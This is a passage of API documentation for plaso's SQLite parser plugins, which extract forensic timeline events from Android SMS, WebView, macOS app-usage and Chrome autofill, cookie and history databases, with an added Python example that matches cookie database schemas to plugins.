0, has_phone_number INTEGER NOT NULL DEFAULT 0, lookup TEXT, status_update_id INTEGER REFERENCES data(_id), contact_last_updated_timestamp INTEGER)', 'data': 'CREATE TABLE data (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), mimetype_id INTEGER REFERENCES mimetype(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, is_read_only INTEGER NOT NULL DEFAULT 0, 
is_primary INTEGER NOT NULL DEFAULT 0, is_super_primary INTEGER NOT NULL DEFAULT 0, data_version INTEGER NOT NULL DEFAULT 0, data1 TEXT, data2 TEXT, data3 TEXT, data4 TEXT, data5 TEXT, data6 TEXT, data7 TEXT, data8 TEXT, data9 TEXT, data10 TEXT, data11 TEXT, data12 TEXT, data13 TEXT, data14 TEXT, data15 TEXT, data_sync1 TEXT, data_sync2 TEXT, data_sync3 TEXT, data_sync4 TEXT )', 'data_usage_stat': 'CREATE TABLE data_usage_stat(stat_id INTEGER PRIMARY KEY AUTOINCREMENT, data_id INTEGER NOT NULL, usage_type INTEGER NOT NULL DEFAULT 0, times_used INTEGER NOT NULL DEFAULT 0, last_time_used INTEGER NOT NULL DEFAULT 0, FOREIGN KEY(data_id) REFERENCES data(_id))', 'default_directory': 'CREATE TABLE default_directory (_id INTEGER PRIMARY KEY)', 'deleted_contacts': 'CREATE TABLE deleted_contacts (contact_id INTEGER PRIMARY KEY, contact_deleted_timestamp INTEGER NOT NULL default 0)', 'directories': 'CREATE TABLE directories(_id INTEGER PRIMARY KEY AUTOINCREMENT, packageName TEXT NOT NULL, authority TEXT NOT NULL, typeResourceId INTEGER, typeResourceName TEXT, accountType TEXT, accountName TEXT, displayName TEXT, exportSupport INTEGER NOT NULL DEFAULT 0, shortcutSupport INTEGER NOT NULL DEFAULT 0, photoSupport INTEGER NOT NULL DEFAULT 0)', 'groups': 'CREATE TABLE groups (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), account_name STRING DEFAULT NULL, account_type STRING DEFAULT NULL, data_set STRING DEFAULT NULL, sourceid TEXT, version INTEGER NOT NULL DEFAULT 1, dirty INTEGER NOT NULL DEFAULT 0, title TEXT, title_res INTEGER, notes TEXT, system_id TEXT, deleted INTEGER NOT NULL DEFAULT 0, group_visible INTEGER NOT NULL DEFAULT 0, should_sync INTEGER NOT NULL DEFAULT 1, auto_add INTEGER NOT NULL DEFAULT 0, favorites INTEGER NOT NULL DEFAULT 0, group_is_read_only INTEGER NOT NULL DEFAULT 0, sync1 TEXT, sync2 TEXT, sync3 TEXT, sync4 TEXT , account_id INTEGER REFERENCES accounts(_id))', 'mimetypes': 'CREATE TABLE mimetypes (_id INTEGER PRIMARY 
KEY AUTOINCREMENT, mimetype TEXT NOT NULL)', 'name_lookup': 'CREATE TABLE name_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_name TEXT NOT NULL, name_type INTEGER NOT NULL, PRIMARY KEY (data_id, normalized_name, name_type))', 'nickname_lookup': 'CREATE TABLE nickname_lookup (name TEXT, cluster TEXT)', 'packages': 'CREATE TABLE packages (_id INTEGER PRIMARY KEY AUTOINCREMENT, package TEXT NOT NULL)', 'phone_lookup': 'CREATE TABLE phone_lookup (data_id INTEGER REFERENCES data(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, normalized_number TEXT NOT NULL, min_match TEXT NOT NULL)', 'photo_files': 'CREATE TABLE photo_files (_id INTEGER PRIMARY KEY AUTOINCREMENT, height INTEGER NOT NULL, width INTEGER NOT NULL, filesize INTEGER NOT NULL)', 'properties': 'CREATE TABLE properties (property_key TEXT PRIMARY KEY, property_value TEXT )'}]
plaso.parsers.sqlite_plugins.android_sms module
SQLite parser plugin for Android text messages (SMS) database files.
class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventData
Bases: plaso.containers.events.EventData
Android SMS event data.
address: phone number associated with the sender or receiver.
Type str
body: content of the SMS text message.
Type str
sms_read: message read status, either Read or Unread.
Type str
sms_type: message type, either Sent or Received.
Type str
DATA_TYPE = 'android:messaging:sms'
class plaso.parsers.sqlite_plugins.android_sms.AndroidSMSPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Android text messages (SMS) database files.
The Android text messages (SMS) database file is typically stored in: mmssms.dbs
DATA_FORMAT = 'Android text messages (SMS) SQLite database (mmssms.dbs) file'
NAME = 'android_sms'
ParseSmsRow(parser_mediator, query, row, **unused_kwargs)
Parses an SMS row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT _id AS id, address, date, read, type, body FROM sms', 'ParseSmsRow')]
REQUIRED_STRUCTURE = {'sms': frozenset({'_id', 'address', 'body', 'date', 'read', 'type'})}
SCHEMAS = [{'addr': 'CREATE TABLE addr (_id INTEGER PRIMARY KEY, msg_id INTEGER, contact_id INTEGER, address TEXT, type INTEGER, charset INTEGER)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'attachments': 'CREATE TABLE attachments (sms_id INTEGER, content_url TEXT, offset INTEGER)', 'canonical_addresses': 'CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY AUTOINCREMENT, address TEXT)', 'drm': 'CREATE TABLE drm (_id INTEGER PRIMARY KEY, _data TEXT)', 'part': 'CREATE TABLE part (_id INTEGER PRIMARY KEY AUTOINCREMENT, mid INTEGER, seq INTEGER DEFAULT 0, ct TEXT, name TEXT, chset INTEGER, cd TEXT, fn TEXT, cid TEXT, cl TEXT, ctt_s INTEGER, ctt_t TEXT, _data TEXT, text TEXT)', 'pd': 'CREATE TABLE pdu (_id INTEGER PRIMARY KEY AUTOINCREMENT, thread_id INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, msg_box INTEGER, read INTEGER DEFAULT 0, m_id TEXT, sub TEXT, sub_cs INTEGER, ct_t TEXT, ct_l TEXT, exp INTEGER, m_cls TEXT, m_type INTEGER, v INTEGER, m_size INTEGER, pri INTEGER, rr INTEGER, rpt_a INTEGER, resp_st INTEGER, st INTEGER, tr_id TEXT, retr_st INTEGER, retr_txt TEXT, retr_txt_cs INTEGER, read_status INTEGER, ct_cls INTEGER, resp_txt TEXT, d_tm INTEGER, d_rpt INTEGER, locked INTEGER DEFAULT 0, seen INTEGER DEFAULT 0, text_only INTEGER DEFAULT 0)', 'pending_msgs': 'CREATE TABLE pending_msgs (_id INTEGER PRIMARY KEY, proto_type INTEGER, msg_id INTEGER, msg_type INTEGER, err_type INTEGER, err_code INTEGER, retry_index INTEGER NOT NULL DEFAULT 0, due_time INTEGER, last_try INTEGER)', 'rate': 'CREATE TABLE rate (sent_time INTEGER)', 'raw': 'CREATE TABLE raw (_id INTEGER PRIMARY KEY, date INTEGER, reference_number INTEGER, count INTEGER, sequence INTEGER, destination_port INTEGER, address TEXT, pdu TEXT)', 'sms': 'CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT, person INTEGER, date INTEGER, date_sent INTEGER DEFAULT 0, protocol INTEGER, read INTEGER DEFAULT 0, status INTEGER DEFAULT -1, type INTEGER, 
reply_path_present INTEGER, subject TEXT, body TEXT, service_center TEXT, locked INTEGER DEFAULT 0, error_code INTEGER DEFAULT 0, seen INTEGER DEFAULT 0)', 'sr_pending': 'CREATE TABLE sr_pending (reference_number INTEGER, action TEXT, data TEXT)', 'threads': 'CREATE TABLE threads (_id INTEGER PRIMARY KEY AUTOINCREMENT, date INTEGER DEFAULT 0, message_count INTEGER DEFAULT 0, recipient_ids TEXT, snippet TEXT, snippet_cs INTEGER DEFAULT 0, read INTEGER DEFAULT 1, type INTEGER DEFAULT 0, error INTEGER DEFAULT 0, has_attachment INTEGER DEFAULT 0)', 'words': 'CREATE VIRTUAL TABLE words USING FTS3 (_id INTEGER PRIMARY KEY, index_text TEXT, source_id INTEGER, table_to_use INTEGER)', 'words_content': "CREATE TABLE 'words_content'(docid INTEGER PRIMARY KEY, 'c0_id', 'c1index_text', 'c2source_id', 'c3table_to_use')", 'words_segdir': "CREATE TABLE 'words_segdir'(level INTEGER, idx INTEGER, start_block INTEGER, leaves_end_block INTEGER, end_block INTEGER, root BLOB, PRIMARY KEY(level, idx))", 'words_segments': "CREATE TABLE 'words_segments'(blockid INTEGER PRIMARY KEY, block BLOB)"}]
SMS_READ = {0: 'UNREAD', 1: 'READ'}
SMS_TYPE = {1: 'RECEIVED', 2: 'SENT'}
plaso.parsers.sqlite_plugins.android_webview module
SQLite parser plugin for Android WebView database files.
class plaso.parsers.sqlite_plugins.android_webview.WebViewCookieEventData
Bases: plaso.containers.events.EventData
Android WebView cookie event data.
cookie_name: name of the cookie.
Type str
data: data stored in the cookie.
Type str
domain: host that set the cookie.
Type str
path: path for which the cookie was set.
Type str
secure: True if the cookie should only be transmitted over a secure channel.
Type bool
url: URL of the cookie.
Type str
DATA_TYPE = 'webview:cookie'
class plaso.parsers.sqlite_plugins.android_webview.WebViewPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Android WebView database files.
DATA_FORMAT = 'Android WebView SQLite database file'
NAME = 'android_webview'
ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
Parses a row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = frozenset({('SELECT _id, name, value, domain, expires, path, secure FROM cookies', 'ParseCookieRow')})
REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cookies': frozenset({'_id', 'domain', 'expires', 'name', 'path', 'secure', 'value'})}
SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cookies': 'CREATE TABLE cookies (_id INTEGER PRIMARY KEY, name TEXT, value TEXT, domain TEXT, path TEXT, expires INTEGER, secure INTEGER)', 'formdata': 'CREATE TABLE formdata (_id INTEGER PRIMARY KEY, urlid INTEGER, name TEXT, value TEXT, UNIQUE (urlid, name, value) ON CONFLICT IGNORE)', 'formurl': 'CREATE TABLE formurl (_id INTEGER PRIMARY KEY, url TEXT)', 'httpauth': 'CREATE TABLE httpauth (_id INTEGER PRIMARY KEY, host TEXT, realm TEXT, username TEXT, password TEXT, UNIQUE (host, realm) ON CONFLICT REPLACE)', 'password': 'CREATE TABLE password (_id INTEGER PRIMARY KEY, host TEXT, username TEXT, password TEXT, UNIQUE (host, username) ON CONFLICT REPLACE)'}]
plaso.parsers.sqlite_plugins.android_webviewcache module
SQLite parser plugin for Android WebviewCache database files.
class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCacheEventData
Bases: plaso.containers.events.EventData
Android WebViewCache event data.
content_length: size of the cached content.
Type int
url: URL the content was retrieved from.
Type str
DATA_TYPE = 'android:webviewcache'
class plaso.parsers.sqlite_plugins.android_webviewcache.AndroidWebViewCachePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Android WebviewCache database files.
DATA_FORMAT = 'Android WebViewCache SQLite database file'
NAME = 'android_webviewcache'
ParseRow(parser_mediator, query, row, **unused_kwargs)
Parses a row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = frozenset({('SELECT url, contentlength, expires, lastmodify FROM cache', 'ParseRow')})
REQUIRED_STRUCTURE = {'android_metadata': frozenset({}), 'cache': frozenset({'contentlength', 'expires', 'lastmodify', 'url'})}
SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'cache': 'CREATE TABLE cache (_id INTEGER PRIMARY KEY, url TEXT, filepath TEXT, lastmodify TEXT, etag TEXT, expires INTEGER, expiresstring TEXT, mimetype TEXT, encoding TEXT, httpstatus INTEGER, location TEXT, contentlength INTEGER, contentdisposition TEXT, UNIQUE (url) ON CONFLICT REPLACE)'}]
plaso.parsers.sqlite_plugins.appusage module
SQLite parser plugin for MacOS application usage database files.
class plaso.parsers.sqlite_plugins.appusage.ApplicationUsagePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS application usage database files.
The MacOS application usage database is typically stored in: /var/db/application_usage.sqlite
Application usage is a SQLite database that logs entries triggered by the NSWorkspaceWillLaunchApplicationNotification and NSWorkspaceDidTerminateApplicationNotification NSWorkspace notifications, as recorded by crankd.
More information can be found here: https://github.com/google/macops/blob/master/crankd/ApplicationUsage.py
DATA_FORMAT = 'MacOS application usage SQLite database (application_usage.sqlite) file'
NAME = 'appusage'
ParseApplicationUsageRow(parser_mediator, query, row, **unused_kwargs)
Parses an application usage row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT last_time, event, bundle_id, app_version, app_path, number_times FROM application_usage ORDER BY last_time', 'ParseApplicationUsageRow')]
REQUIRED_STRUCTURE = {'application_usage': frozenset({'app_path', 'app_version', 'bundle_id', 'event', 'last_time', 'number_times'})}
SCHEMAS = [{'application_usage': 'CREATE TABLE application_usage (event TEXT, bundle_id TEXT, app_version TEXT, app_path TEXT, last_time INTEGER DEFAULT 0, number_times INTEGER DEFAULT 0, PRIMARY KEY (event, bundle_id))'}]
class plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData
Bases: plaso.containers.events.EventData
MacOS application usage event data.
application: name of the application.
Type str
app_version: version of the application.
Type str
bundle_id: bundle identifier of the application.
Type str
count: TODO: number of times what?
Type int
DATA_TYPE = 'macosx:application_usage'
plaso.parsers.sqlite_plugins.chrome_autofill module
SQLite parser plugin for Google Chrome autofill database (Web Data) files.
class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillEventData
Bases: plaso.containers.events.EventData
Chrome Autofill event data.
field_name: name of form field.
Type str
value: value populated in form field.
Type str
usage_count: count of times value has been used in field_name.
Type int
DATA_TYPE = 'chrome:autofill:entry'
class plaso.parsers.sqlite_plugins.chrome_autofill.ChromeAutofillPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Chrome autofill database (Web Data) files.
The Google Chrome autofill database (Web Data) file is typically stored in: Web Data
DATA_FORMAT = 'Google Chrome autofill SQLite database (Web Data) file'
NAME = 'chrome_autofill'
ParseAutofillRow(parser_mediator, query, row, **unused_kwargs)
Parses an autofill entry row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT autofill.date_created, autofill.date_last_used, autofill.name, autofill.value, autofill.count FROM autofill ORDER BY date_created', 'ParseAutofillRow')]
REQUIRED_STRUCTURE = {'autofill': frozenset({'count', 'date_created', 'date_last_used', 'name', 'value'})}
SCHEMAS = [{'autofill': 'CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value));)'}]
plaso.parsers.sqlite_plugins.chrome_cookies module
SQLite parser plugin for Google Chrome cookies database files.
class plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Chrome cookies database files.
GA_UTMZ_TRANSLATION = {'utmccn': 'Ad campaign information.', 'utmcct': 'Path to the page of referring link.', 'utmcmd': 'Last type of visit.', 'utmcsr': 'Last source used to access.', 'utmctr': 'Keywords used to find site.'}
ParseCookieRow(parser_mediator, query, row, **unused_kwargs)
Parses a cookie row.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from the query.
URLS = ['http://src.chromium.org/svn/trunk/src/net/cookies/', 'http://www.dfinews.com/articles/2012/02/google-analytics-cookies-and-forensic-implications']
class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome17CookiePlugin
Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
SQLite parser plugin for Google Chrome 17 - 65 cookies database files.
DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file'
NAME = 'chrome_17_cookies'
QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, secure, httponly, last_access_utc, has_expires, persistent FROM cookies', 'ParseCookieRow')]
REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'httponly', 'last_access_utc', 'name', 'path', 'persistent', 'secure', 'value'}), 'meta': frozenset({})}
SCHEMAS = [{'cookies': 'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent INTEGER DEFAULT 1)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]
class plaso.parsers.sqlite_plugins.chrome_cookies.Chrome66CookiePlugin
Bases: plaso.parsers.sqlite_plugins.chrome_cookies.BaseChromeCookiePlugin
SQLite parser plugin for Google Chrome 66+ cookies database files.
DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file'
NAME = 'chrome_66_cookies'
QUERIES = [('SELECT creation_utc, host_key, name, value, path, expires_utc, is_secure AS secure, is_httponly AS httponly, last_access_utc, has_expires, is_persistent AS persistent FROM cookies', 'ParseCookieRow')]
REQUIRED_STRUCTURE = {'cookies': frozenset({'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'is_httponly', 'is_persistent', 'is_secure', 'last_access_utc', 'name', 'path', 'value'}), 'meta': frozenset({})}
SCHEMAS = [{'cookies': "CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, encrypted_value BLOB DEFAULT '', firstpartyonly INTEGER NOT NULL DEFAULT 0, UNIQUE (host_key, name, path))", 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)'}]
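The REQUIRED_STRUCTURE attributes above are what distinguish the Chrome 17 - 65 and Chrome 66+ cookie schemas (`secure` versus `is_secure`, and so on): a plugin only applies when every required table exists and contains every required column, and an empty column set still requires the table itself. The following is an added Python example, not plaso's own code: it re-implements that matching rule over constructed in-memory databases built from the SCHEMAS statements above, so you can see which plugin a given cookies database would select.

```python
import sqlite3

# Required tables and their required columns, copied from the REQUIRED_STRUCTURE
# attributes of Chrome17CookiePlugin and Chrome66CookiePlugin above. An empty
# frozenset means the table must exist but no particular column is required.
REQUIRED_STRUCTURES = {
    'chrome_17_cookies': {
        'cookies': frozenset({
            'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'httponly',
            'last_access_utc', 'name', 'path', 'persistent', 'secure', 'value'}),
        'meta': frozenset()},
    'chrome_66_cookies': {
        'cookies': frozenset({
            'creation_utc', 'expires_utc', 'has_expires', 'host_key', 'is_httponly',
            'is_persistent', 'is_secure', 'last_access_utc', 'name', 'path', 'value'}),
        'meta': frozenset()},
}

# CREATE TABLE statements copied from the SCHEMAS attributes above; they are used
# here only to build constructed in-memory databases for the demonstration.
META_SCHEMA = (
    'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)')

CHROME_17_SCHEMA = [
    'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY KEY, '
    'host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, '
    'path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure INTEGER NOT NULL, '
    'httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, '
    'has_expires INTEGER DEFAULT 1, persistent INTEGER DEFAULT 1)',
    META_SCHEMA]

CHROME_66_SCHEMA = [
    'CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT NOT NULL, '
    'name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT NULL, '
    'expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, '
    'is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, '
    'has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT NULL DEFAULT 1, '
    "priority INTEGER NOT NULL DEFAULT 1, encrypted_value BLOB DEFAULT '', "
    'firstpartyonly INTEGER NOT NULL DEFAULT 0, UNIQUE (host_key, name, path))',
    META_SCHEMA]


def read_structure(connection):
    """Returns {table_name: frozenset(column_names)} for every table in a database."""
    structure = {}
    table_rows = connection.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    for (table_name,) in table_rows:
        # Table names come from sqlite_master, so quote them as identifiers.
        quoted_name = '"{0:s}"'.format(table_name.replace('"', '""'))
        column_rows = connection.execute(
            'PRAGMA table_info({0:s})'.format(quoted_name)).fetchall()
        # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk).
        structure[table_name] = frozenset(row[1] for row in column_rows)
    return structure


def matching_plugins(structure, required_structures=REQUIRED_STRUCTURES):
    """Returns the names of plugins whose required tables and columns are all present."""
    matches = []
    for plugin_name, required in required_structures.items():
        if all(table in structure and columns <= structure[table]
               for table, columns in required.items()):
            matches.append(plugin_name)
    return sorted(matches)


def classify_schema(create_statements):
    """Builds a constructed in-memory database from CREATE TABLE statements and
    reports which plugins would accept it."""
    connection = sqlite3.connect(':memory:')
    try:
        for statement in create_statements:
            connection.execute(statement)
        return matching_plugins(read_structure(connection))
    finally:
        connection.close()


if __name__ == '__main__':
    print(classify_schema(CHROME_17_SCHEMA))  # ['chrome_17_cookies']
    print(classify_schema(CHROME_66_SCHEMA))  # ['chrome_66_cookies']
    # Without the meta table neither plugin matches, even though every required
    # cookies column is present: an empty required column set still needs the table.
    print(classify_schema(CHROME_66_SCHEMA[:1]))  # []
```

Pointing `read_structure` at a real `Cookies` file (open it read-only on a copy, never on the evidence) tells you which of the two plugins plaso will use before you run the full timeline.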
class plaso.parsers.sqlite_plugins.chrome_cookies.ChromeCookieEventData
Bases: plaso.containers.events.EventData
Chrome Cookie event data.
cookie_name: name of the cookie.
Type str
host: hostname of host that set the cookie value.
Type str
httponly: True if the cookie cannot be accessed through client side script.
Type bool
path: path where the cookie got set.
Type str
persistent: True if the cookie is persistent.
Type bool
secure: True if the cookie should only be transmitted over a secure channel.
Type bool
url: URL or path where the cookie got set.
Type str
data: value of the cookie.
Type str
DATA_TYPE = 'chrome:cookie:entry'
plaso.parsers.sqlite_plugins.chrome_extension_activity module
SQLite parser plugin for Google Chrome extension activity database files.
class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData
Bases: plaso.containers.events.EventData
Chrome Extension Activity event data.
action_type: action type.
Type str
activity_id: activity identifier.
Type str
api_name: name of API.
Type str
arg_url: URL argument.
Type str
args: arguments.
Type str
extension_id: extension identifier.
Type str
other: other.
Type str
page_title: title of webpage.
Type str
page_url: URL of webpage.
Type str
DATA_TYPE = 'chrome:extension_activity:activity_log'
class plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Chrome extension activity database files.
The Google Chrome extension activity database file is typically stored in: Extension Activity
DATA_FORMAT = 'Google Chrome extension activity SQLite database file'
NAME = 'chrome_extension_activity'
ParseActivityLogUncompressedRow(parser_mediator, query, row, **unused_kwargs)
Parses an activity log row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT time, extension_id, action_type, api_name, args, page_url, page_title, arg_url, other, activity_id FROM activitylog_uncompressed ORDER BY time', 'ParseActivityLogUncompressedRow')]
REQUIRED_STRUCTURE = {'activitylog_compressed': frozenset({'action_type', 'activity_id', 'api_name', 'arg_url', 'args', 'extension_id', 'other', 'page_title', 'page_url', 'time'})}
SCHEMAS = [{'activitylog_compressed': 'CREATE TABLE activitylog_compressed (count INTEGER NOT NULL DEFAULT 1, extension_id_x INTEGER NOT NULL, time INTEGER, action_type INTEGER, api_name_x INTEGER, args_x INTEGER, page_url_x INTEGER, page_title_x INTEGER, arg_url_x INTEGER, other_x INTEGER)', 'string_ids': 'CREATE TABLE string_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)', 'url_ids': 'CREATE TABLE url_ids (id INTEGER PRIMARY KEY, value TEXT NOT NULL)'}]
plaso.parsers.sqlite_plugins.chrome_history module
SQLite parser plugin for Google Chrome history database files.
class plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Chrome history database files.
The Google Chrome history database file is typically stored in: Archived History, History
Note that the Archived History database does not contain the downloads table.
ParseLastVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
Parses a last visited row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
• cache (SQLiteCache) – cache which contains cached results from querying the visits and urls tables.
• database (Optional[SQLiteDatabase]) – database.
class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryFileDownloadedEventData
Bases: plaso.containers.events.EventData
Chrome History file downloaded event data.
full_path: full path where the file was downloaded to.
Type str
received_bytes: number of bytes received while downloading.
Type int
total_bytes: total number of bytes to download.
Type int
url: URL of the downloaded file.
Type str
DATA_TYPE = 'chrome:history:file_downloaded'
class plaso.parsers.sqlite_plugins.chrome_history.ChromeHistoryPageVisitedEventData
Bases: plaso.containers.events.EventData
Chrome History page visited event data.
from_visit: URL where the visit originated from.
Type str
page_transition_type: type of transitions between pages.
Type int
title: title of the visited page.
Type str
typed_count: number of characters of the URL that were typed.
Type int
url: URL of the visited page.
Type str
url_hidden: True if the URL is hidden.
Type bool
visit_source: source of the page visit.
Type int
DATA_TYPE = 'chrome:history:page_visited'
class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome27HistoryPlugin
Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin
SQLite parser plugin for Google Chrome 27+ history database files.
DATA_FORMAT = 'Google Chrome 27 and later history SQLite database file'
NAME = 'chrome_27_history'
ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs)
Parses a file downloaded row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT downloads.id AS id, downloads.start_time,downloads.target_path, downloads_url_chains.url, downloads.received_bytes, downloads.total_bytes FROM downloads, downloads_url_chains WHERE downloads.id = downloads_url_chains.id', 'ParseFileDownloadedRow')]
REQUIRED_STRUCTURE = {'downloads': frozenset({'id', 'received_bytes', 'start_time', 'target_path', 'total_bytes'}), 'downloads_url_chains': frozenset({'id', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}
SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER 